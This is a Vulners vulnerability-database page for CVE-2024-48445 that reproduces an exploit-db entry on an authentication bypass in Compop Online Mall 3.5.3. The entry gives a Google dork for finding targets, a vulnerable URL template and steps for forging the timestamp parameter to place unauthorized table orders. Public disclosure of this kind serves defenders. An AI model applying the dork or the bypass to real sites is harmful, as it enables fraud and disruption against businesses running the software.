| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2024-48445 | 4 Feb 202522:16 | – | circl | |
| COMPOP 安全漏洞 | 4 Feb 202500:00 | – | cnnvd | |
| CVE-2024-48445 | 4 Feb 202500:00 | – | cve | |
| CVE-2024-48445 | 4 Feb 202500:00 | – | cvelist | |
| compop.ca 3.5.3 - Arbitrary code Execution | 17 Apr 202500:00 | – | exploitdb | |
| CVE-2024-48445 | 4 Feb 202523:15 | – | nvd | |
| 📄 compop.ca 3.5.3 Arbitrary Code Execution | 18 Apr 202500:00 | – | packetstorm | |
| PT-2025-2798 · Unknown · Compop.Ca Online Mall | 4 Feb 202500:00 | – | ptsecurity | |
| CVE-2024-48445 | 8 Feb 202504:34 | – | redhatcve | |
| CVE-2024-48445 | 4 Feb 202500:00 | – | vulnrichment |
# Exploit Title: Compop Online Mall Authentication Bypass
# Google Dork: Terms of Use inurl:compop.vip
# Exploit Author: dmlino
# Vendor Homepage: https://www.compop.ca/
# Version: 3.5.3
# CVE : CVE-2024-48445
Vulnerability Overview:
The system uses a Unix timestamp ("ts") parameter in URLs for authentication, which is fundamentally flawed. By changing the timestamp to the current time, an attacker can bypass access controls.
Vulnerable URL Structure:
https://VULNERABLE.COM/Home?rid=11111&tid=1&h5sty=3&et=2&ts=CURRENT_TIMESTAMP
Key Parameters:
rid: Restaurant ID
tid: Table Number
ts: Unix Timestamp (authentication mechanism)
Exploitation Method:
Obtain current Unix timestamp
Linux: date +%s
Windows PowerShell: [int](Get-Date -UFormat %s -Millisecond 0)
Replace "ts" value in URL with current timestamp
Submit modified URL to place unauthorized orders
Impact:
An attacker can place orders for any table by manipulating the timestamp, potentially causing operational disruption for the restaurant.
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation